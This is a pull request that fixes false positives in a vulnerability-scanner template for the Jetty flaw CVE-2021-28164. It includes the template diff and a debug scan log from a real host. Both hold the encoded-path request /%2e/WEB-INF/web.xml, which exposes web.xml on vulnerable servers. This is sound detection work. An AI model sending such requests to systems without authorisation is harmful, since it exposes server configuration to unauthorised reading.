### PR TITLE
fix: false positive on flow template CVE-2021-28164

### DIFF
--- a/http/cves/2021/CVE-2021-28164.yaml
+++ b/http/cves/2021/CVE-2021-28164.yaml
@@ -29,33 +29,27 @@ info:
     vendor: eclipse
     product: jetty
   tags: packetstorm,vulhub,cve,cve2021,jetty,exposure,eclipse
-flow: http(1) && http(2)
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/WEB-INF/web.xml"
+  - raw:
+      - |
+        GET /WEB-INF/web.xml HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /%2e/WEB-INF/web.xml HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: dsl
         internal: true
         dsl:
-          - "!contains_all(body, '</web-app>', 'java.sun.com')"
-          - "!contains_all(header, 'application/xml')"
-          - "status_code != 200"
-          - "status_code != 404"
+          - "!contains_all(body_1, '</web-app>', 'java.sun.com')"
+          - "!contains_all(all_headers_1, 'application/xml')"
+          - "status_code_1 != 200 && status_code_1 != 404"
+          - "contains_all(body_2, '</web-app>', 'java.sun.com')"
+          - "contains_all(all_headers_2, 'application/xml')"
+          - "status_code_2 == 200"
         condition: and
 
-  - method: GET
-    path:
-      - "{{BaseURL}}/%2e/WEB-INF/web.xml"
-
-    matchers-condition: and
-    matchers:
-      - type: dsl
-        dsl:
-          - "contains_all(body, '</web-app>', 'java.sun.com')"
-          - "contains_all(header, 'application/xml')"
-          - "status_code == 200"
-        condition: and
 # digest: 4b0a00483046022100dd30417bdfd5e67668cbd4872236ce39eddb905594981f1b7921c68988af905a02210082757c9e793c61d5fd079c50e0b152a35d53df34042aea7a3e93e361d1196674:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
This template returns many false positives if the scanned host redirects to another website (30x status codes). You can try this template on a host on Shodan with a query like this

https://www.shodan.io/search?query=http.title%3A%22301+Moved%22

Example:
```

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.1.7

                projectdiscovery.io

[INF] Current nuclei version: v3.1.7 (latest)
[INF] Current nuclei-templates version: v9.7.4 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 6
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2021-28164] Dumped HTTP request for https://52.212.159.195/WEB-INF/web.xml

GET /WEB-INF/web.xml HTTP/1.1
Host: 52.212.159.195
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2021-28164] Dumped HTTP response https://52.212.159.195/WEB-INF/web.xml

HTTP/1.1 302 Found
Connection: close
Content-Length: 223
Content-Type: text/html; charset=iso-8859-1
Date: Wed, 24 Jan 2024 03:50:13 GMT
Location: https://www.britbox.com/WEB-INF/web.xml

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.britbox.com/WEB-INF/web.xml">here</a>.</p>
</body></html>
[CVE-2021-28164:dsl-1] [http] [medium] https://52.212.159.195/WEB-INF/web.xml
[INF] [CVE-2021-28164] Dumped HTTP request for https://52.212.159.195/./WEB-INF/web.xml

GET /%2e/WEB-INF/web.xml HTTP/1.1
Host: 52.212.159.195
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2021-28164] Dumped HTTP response https://52.212.159.195/./WEB-INF/web.xml

HTTP/1.1 302 Found
Connection: close
Content-Length: 223
Content-Type: text/html; charset=iso-8859-1
Date: Wed, 24 Jan 2024 03:50:14 GMT
Location: https://www.britbox.com/WEB-INF/web.xml

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.britbox.com/WEB-INF/web.xml">here</a>.</p>
</body></html>
```

If my assumptions is correct, this `flow` template had a bug where this template only check the first condition and ignore the rest